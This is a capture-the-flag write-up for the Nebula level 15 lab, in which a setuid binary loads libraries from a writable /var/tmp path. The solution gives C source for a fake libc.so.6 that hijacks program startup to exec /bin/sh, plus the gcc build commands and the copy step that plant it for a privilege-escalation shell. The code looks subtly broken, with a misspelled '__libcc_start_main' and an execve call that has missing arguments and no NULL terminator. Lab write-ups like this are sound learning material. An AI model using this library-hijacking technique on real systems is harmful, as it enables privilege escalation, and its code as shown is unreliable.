Nebula - Level 15 - Library Loading

About

strace the binary at /home/flag15/flag15 and see if you spot anything out of the ordinary. You may wish to review how to “compile a shared library in linux” and how the libraries are loaded and processed by reviewing the dlopen manpage in depth. Clean up after yourself :) To do this level, log in as the level15 account with the password level15. Files for this level can be found in /home/flag15.

Solution

Running strace shows that the binary searches for several libraries in the folder /var/tmp/flag15/* We use this information to populate the necessary libraries for the program by crafting a custom libc.so.6. Create a file run.sh with /bin/bash as the contents. Create the shared library libc.c with the contents

#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

void __cxa_finalize(void *d){
	return;
}

int __libcc_start_main(int (*main) (int, char**, char**), int argc, char** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)){
	char* args[] = {"/bin/sh", "/home/level15/run.sh"};
	execve("/bin/sh", args);
	return 0;
}

Compile the library with gcc -fPIC -g -c -Wall /home/level15/libc.c && gcc -shared -Wl,-Bstatic,-soname,libc.so.6,--version-script,version -o libc.so.6 libc.o -L/usr/lib/i386-linux-gnu -static-libgcc and then copy it to the correct directory: cp libc.so.6 /var/tmp/flag15/tls/i686/sse2/libc.so.6. Execute the program to get a shell. Note that /bin/bash MUST NOT be used as bash will often attempt to drop privileges when executing.